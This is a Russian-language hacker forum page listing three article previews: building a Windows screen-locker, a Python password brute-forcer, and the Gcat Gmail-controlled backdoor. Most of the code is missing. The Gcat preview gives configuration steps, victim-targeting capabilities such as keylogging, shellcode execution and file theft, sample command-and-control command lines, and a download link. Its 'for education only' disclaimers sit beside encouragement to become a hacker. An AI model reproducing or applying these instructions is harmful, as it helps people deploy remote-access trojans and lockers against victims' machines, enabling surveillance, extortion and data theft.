Новости и объявления.
- Уважаемые гости. При посещении нашего сайта, просим вас ознакомиться с разделами форума, прежде чем оставлять ваши объявления и т.д. Рекомендуем посетить разделы: "Общение, Коммерческий раздел, Услуги Хакеров и статьи, Отзывы о сайте и пользователях, Черный список" и другие разделы нашего сайта. ***ВНИМАНИЕ*** При обращении за помощью, просим быть внимательными, на сайте есть, как проверенные специалисты, так и непроверенные. Если вы обратились к специалисту, который проверку НЕ проходил, рекомендуем воспользоваться услугой гарант сервиса. xakervip.com
Search the Community
Showing results for tags 'питон'.
-
Привет, хакеры, сейчас разберем один из способов создания винлокера. Узнаем его возможности и функции, увидим код и научимся создавать его. Хочу напомнить читателю, что все находящиеся здесь данные были получены из открытых источников и находится здесь лишь в целях ознакомления, а также не призывает вас к описанным действиям. Создано только для обучения и развлечения. Вся информация сделана для того, чтобы пользователи могли защититься от махинаций мошенников. Все причиненные возможные убытки посетитель берет на себя. Автор проделывает все на своем оборудовании и в собственной сети. Не повторяйте ничего из прочитанного в реальной жизни. Функции: -Блокировать клавиши F4/alt+F4/Fn+F4-Переводим мышку в позицию координат X и Y-Запоминать сессиюНабор невелик, однако его хватит, для углубленного ознакомления с подобными программами и научиться ими пользоваться. В случае интереса данной темы, можете самостоятельно или с чьей-либо помощью наращивать количество функционала. Это даст большой опыт в программировании и позволит лучше защищаться от таких вирусных приложений. Надеюсь, эта статья помогла вам. Напоминаю, что она написана исключительно для проверки своих способностей и мастерства и не призывает к действиям.
-
Привет ребята, хочу рассказать вам о простом коде, который можно использовать для перебора рандомных созданных паролей, для взлома. Конечно, для демонстрации взламывать мы будем свой пароль, который мы введем, потому что этот код не предназначен быть скриптом для брута, это лишь небольшое пособие новичкам в программирование, чтобы они уяснили, как работают подобные скрипты. Первым делом необходимо определиться с языком программирования. Думаю из названия статьи вы уже поняли, что использоваться будет язык Python, он легок в понимании и приятен глазу. С помощью питона будет легко показать, как происходит перебор паролей. Думаю стоит закончит предисловие и прейти к делу. Первым делом нам нужно импортировать модули, понадобиться только модуль random. Ипортируем: Теперь необходимо определить переменные, всего их будет 6 Это все переменные необходимые для работы скрипта. Далее мы создаем цикл. В цикле будет выполнятся вся работе. Также добавим данную строчку для того, чтобы обнуляться переменную password. Теперь нас ждет самое интересное – генерация и перебор паролей. Для начала создаем цикл for, чтобы генерировать пароли. Тут понадобится переменная length Теперь создаем код, с помощью которого можно будет узнать, был ли ранее сгенерирован тот или иной пароль, а также проверить идентичен ли он. Собственно это все, нет ничего сложного. Я надеюсь, что данная небольшая статья помогла кому-то разобраться в этих тонкостях. Возможно даже вы когда-нибудь станете хакером.
-
Всем привет, в этой статье я хочу вам показать один из бесплатных троянов, который написан на питоне, а именно о Gcat. Gcat является скрытным бэкдором написанным соответственно на питоне. Он использует почтовый сервис Gmail, для так называемого command and control сервера. Чтобы данный троян мог работать, ему понадобится почта на данном сервиса, вместе с включенной функцией Allow less secure apps, которую можно включать в настройках вашей учетной записи. Данный нам репозиторий содержит в себе всего лишь 2 файла: Gcat.py – сам скрипт, который перечисляет все доступные клиенты и передает им командыImplant.py – является самим бэкдоромЧтобы все заработало, нужно изменить всего лишь две переменные, а именно: gmail_user, gmail_pwd. Итак, клиент предоставляем нам обширные возможности, можно выполнить такие команды: Выполнение команд, удаленное скачивание файлов у жертвы, после отправки шелл кода его можно выполнить, скачать скрин экрана, отключить экран жертвы, запустить и отключить кейлогер. Вот так выглядит запуск различных команд в клиенте: # python gcat.py-id 90b2cd83-cb36-52de-84ee-99db6ff41a11-cmd ‘ipconfig /all’ [*] Command sent successfully with jobid: SH3C4gv После чего запрашиваем результат для определенного Id и JobId: # python gcat.py-id 90b2cd83-cb36-52de-84ee-99db6ff41a11-jobid SH3C4gv DATE: ‘Tue, 09 Jun 2015 06:51:44 -0700 (PDT)’ JOBID: SH3C4gv FG WINDOW: ‘Command Prompt - C:Python27python.exe implant.py’ CMD: ‘ipconfig /all’ Если будет нехватка чего-либо, то это легко исправить, просто дописав необходимые компоненты. Ссылка для скачивания репозитория: github.com/byt3bl33d3r/gcat Данный троян можно запустить на таких операционных системах как Windows и различные Unix-подобные системы.